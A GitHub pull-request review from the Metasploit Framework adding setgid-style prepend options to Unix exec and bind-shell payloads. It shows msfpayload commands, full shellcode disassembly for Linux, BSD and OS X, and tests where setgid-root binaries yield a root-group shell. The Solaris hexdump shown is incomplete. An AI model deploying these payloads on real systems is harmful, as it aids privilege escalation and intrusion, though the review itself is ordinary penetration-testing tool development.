
add PrependSet[re]gid support for unix* payloads #885

Merged
merged 1 commit into from Oct 19, 2012

Conversation

mephos
Contributor

@mephos mephos commented Oct 10, 2012

No description provided.

@jvazquez-r7
Contributor

Looked at the Linux x86 case. The disassembly looks good:

$ ./msfpayload linux/x86/exec CMD=/bin/bash PrependSetresgid=true PrependSetregid=true PrependSetgid=true R > exec_sh.raw
$ ndisasm -b 32 exec_sh.raw
00000000  31C9              xor ecx,ecx // PrependSetresgid
00000002  31DB              xor ebx,ebx
00000004  F7E3              mul ebx
00000006  B0AA              mov al,0xaa
00000008  CD80              int 0x80
0000000A  31C9              xor ecx,ecx // PrependSetregid
0000000C  31DB              xor ebx,ebx
0000000E  6A47              push byte +0x47
00000010  58                pop eax
00000011  CD80              int 0x80
00000013  31DB              xor ebx,ebx // PrependSetgid
00000015  6A2E              push byte +0x2e
00000017  58                pop eax
00000018  CD80              int 0x80
0000001A  6A0B              push byte +0xb // Shellcode
0000001C  58                pop eax
0000001D  99                cdq
0000001E  52                push edx
0000001F  66682D63          push word 0x632d
00000023  89E7              mov edi,esp
00000025  682F736800        push dword 0x68732f
0000002A  682F62696E        push dword 0x6e69622f
0000002F  89E3              mov ebx,esp
00000031  52                push edx
00000032  E80A000000        call 0x41
00000037  2F                das
00000038  62696E            bound ebp,[ecx+0x6e]
0000003B  2F                das
0000003C  626173            bound esp,[ecx+0x73]
0000003F  6800575389        push dword 0x89535700
00000044  E1CD              loope 0x13
00000046  80                db 0x80

And the test on Debian 6 was successful:

juan@debiansmb:~$ ls -la exec_sh.elf 
-rwsr-sr-x 1 root root 155 Oct 11 12:27 exec_sh.elf
juan@debiansmb:~$ id
uid=1000(juan) gid=1000(juan) groups=1000(juan),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),109(bluetooth),115(scanner)
juan@debiansmb:~$ ./exec_sh.elf 
bash-4.1$ id
uid=1000(juan) gid=0(root) groups=1000(juan),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),109(bluetooth),115(scanner)

@jvazquez-r7
Contributor

The Linux case for x86_64 platforms also looks good to me:

The output for:

./msfpayload linux/x64/exec CMD=/bin/bash PrependSetresgid=true PrependSetregid=true PrependSetgid=true R > exec_64_sh.raw

is:

00000000  4831FF            xor rdi,rdi // PrependSetresgid
00000003  4889FE            mov rsi,rdi
00000006  6A77              push byte +0x77
00000008  58                pop rax
00000009  0F05              loadall286
0000000B  4831FF            xor rdi,rdi // PrependSetregid
0000000E  4889FE            mov rsi,rdi
00000011  4889F2            mov rdx,rsi
00000014  6A72              push byte +0x72
00000016  58                pop rax
00000017  0F05              loadall286
00000019  4831FF            xor rdi,rdi // PrependSetgid
0000001C  6A6A              push byte +0x6a
0000001E  58                pop rax
0000001F  0F05              loadall286
00000021  6A3B              push byte +0x3b // shellcode
00000023  58                pop rax
00000024  99                cdq
00000025  48BB2F62696E2F73  mov rbx,0x68732f6e69622f
         -6800
0000002F  53                push rbx
00000030  4889E7            mov rdi,rsp
00000033  68                db 0x68
00000034  2D63000048        sub eax,0x48000063
00000039  89E6              mov esi,esp
0000003B  52                push rdx
0000003C  E80A000000        call dword 0x4b
00000041  2F                db 0x2f
00000042  62                db 0x62
00000043  696E2F62617368    imul ebp,[rsi+0x2f],dword 0x68736162
0000004A  005657            add [rsi+0x57],dl
0000004D  4889E6            mov rsi,rsp
00000050  0F05              loadall286

And it works; tested on Ubuntu 10.04 x86_64:

test@ubuntu:~$ ls -la exec_64_sh.elf 
-rwsr-sr-x 1 root root 202 2012-10-11 04:03 exec_64_sh.elf
test@ubuntu:~$ id -G
1002 4 20 21 24 25 26 30 44 46 104
test@ubuntu:~$ ./exec_64_sh.elf 
bash-4.1$ id -G
0 4 20 21 24 25 26 30 44 46 104 1002
bash-4.1$ id -g
0

@jvazquez-r7
Contributor

On the other hand... when testing the osx x86 case:

$ ./msfpayload osx/x86/exec CMD=/bin/bash PrependSetresgid=true PrependSetregid=true PrependSetgid=true R > osx_x86.raw

There is just the shellcode; none of the prepended code is there:

$ ndisasm -b 32 osx_x86.raw 
00000000  31C0              xor eax,eax
00000002  50                push eax
00000003  E80A000000        call 0x12
00000008  2F                das
00000009  62696E            bound ebp,[ecx+0x6e]
0000000C  2F                das
0000000D  626173            bound esp,[ecx+0x73]
00000010  68005E89E7        push dword 0xe7895e00
00000015  B90A000000        mov ecx,0xa
0000001A  FC                cld
0000001B  F2A4              repne movsb
0000001D  89E3              mov ebx,esp
0000001F  50                push eax
00000020  50                push eax
00000021  53                push ebx
00000022  B03B              mov al,0x3b
00000024  50                push eax
00000025  CD80              int 0x80

The same when using just the PrependSetuid option:

$ ./msfpayload osx/x86/exec CMD=/bin/bash PrependSetuid=true R > osx_x86.raw
Juans-MacBook-Pro:metasploit-framework juan$ ndisasm -b 32 osx_x86.raw 
00000000  31C0              xor eax,eax
00000002  50                push eax
00000003  E80A000000        call 0x12
00000008  2F                das
00000009  62696E            bound ebp,[ecx+0x6e]
0000000C  2F                das
0000000D  626173            bound esp,[ecx+0x73]
00000010  68005E89E7        push dword 0xe7895e00
00000015  B90A000000        mov ecx,0xa
0000001A  FC                cld
0000001B  F2A4              repne movsb
0000001D  89E3              mov ebx,esp
0000001F  50                push eax
00000020  50                push eax
00000021  53                push ebx
00000022  B03B              mov al,0x3b
00000024  50                push eax
00000025  CD80              int 0x80

I think the problem here is in the exec payload module for osx x86: it isn't including the Msf::Payload::Osx mixin, so the generate() function is not being redefined!

btw: the exec payload module is the only osx payload module which doesn't include the Msf::Payload::Osx mixin. Anyway, I'll ask a more experienced developer to review it.

@jvazquez-r7
Contributor

While testing this pull request... I'm wondering why these prepends weren't available in msf; maybe because from the exploit point of view the uid is more interesting than the gid.... Anyway, I'll be checking this topic with more experienced developers!

@jvazquez-r7
Contributor

In the case of BSD the prepending is working as expected:

$ ./msfpayload bsd/x86/exec CMD=/bin/bash PrependSetresgid=true PrependSetregid=true PrependSetgid=true R > exec_bsd.raw
Juans-MacBook-Pro:metasploit-framework juan$ ndisasm -b 32 exec_bsd.raw 
00000000  31C0              xor eax,eax //PrependSetresgid
00000002  50                push eax
00000003  50                push eax
00000004  50                push eax
00000005  50                push eax
00000006  66B83801          mov ax,0x138
0000000A  CD80              int 0x80
0000000C  31C0              xor eax,eax //PrependSetregid
0000000E  50                push eax
0000000F  50                push eax
00000010  50                push eax
00000011  B07F              mov al,0x7f
00000013  CD80              int 0x80
00000015  31C0              xor eax,eax //PrependSetgid
00000017  50                push eax
00000018  50                push eax
00000019  B0B5              mov al,0xb5
0000001B  CD80              int 0x80
0000001D  6A3B              push byte +0x3b //shellcode
0000001F  58                pop eax
00000020  99                cdq
00000021  52                push edx
00000022  682D630000        push dword 0x632d
00000027  89E7              mov edi,esp
00000029  52                push edx
0000002A  686E2F7368        push dword 0x68732f6e
0000002F  682F2F6269        push dword 0x69622f2f
00000034  89E3              mov ebx,esp
00000036  52                push edx
00000037  E80A000000        call 0x46
0000003C  2F                das
0000003D  62696E            bound ebp,[ecx+0x6e]
00000040  2F                das
00000041  626173            bound esp,[ecx+0x73]
00000044  6800575389        push dword 0x89535700
00000049  E152              loope 0x9d
0000004B  51                push ecx
0000004C  53                push ebx
0000004D  50                push eax
0000004E  CD80              int 0x80

And when executing:

$ ls -la exec_bsd.elf 
-rwsr-sr-x  1 root  juan  162 Oct 11 20:17 exec_bsd.elf
$ ./exec_bsd.elf 
# id -g
0
# id -gr
0

@jvazquez-r7
Contributor

I was wrong about the Solaris case, it's prepending the options correctly:

Juans-MacBook-Pro:metasploit-framework juan$ ./msfpayload solaris/x86/shell_bind_tcp RHOST=192.168.1.137 LPORT=4444 PrependSetregid=true R > shell_bind_solaris.raw
Juans-MacBook-Pro:metasploit-framework juan$ hexdump -C shell_bind_solaris.raw 
00000000  68 ff d8 ff 3c 6a 65 89  e6 f7 56 04 f6 16 31 c0  |h...X...O.y.Ph/|
00000060  2f 73 68 68 2f 62 69 6e  89 e3 50 53 89 e1 50 51  |/shh/bin..PS..PQ|
00000070  53 b0 3b ff d6                                    |S.;..|
00000075

The prepending code for PrependSetregid has been added successfully at offset 0xe:

31 c0 50 50 b0 cb ff d6

Sorry for the inconvenience!! My fault!

I'm just asking a more experienced developer to do a final review of this pull request (especially the Solaris case) and #919 before merging!

@jvazquez-r7 jvazquez-r7 merged commit 90b948f into rapid7:master Oct 19, 2012
@jvazquez-r7
Contributor

Finally merged :) thanks mephos!
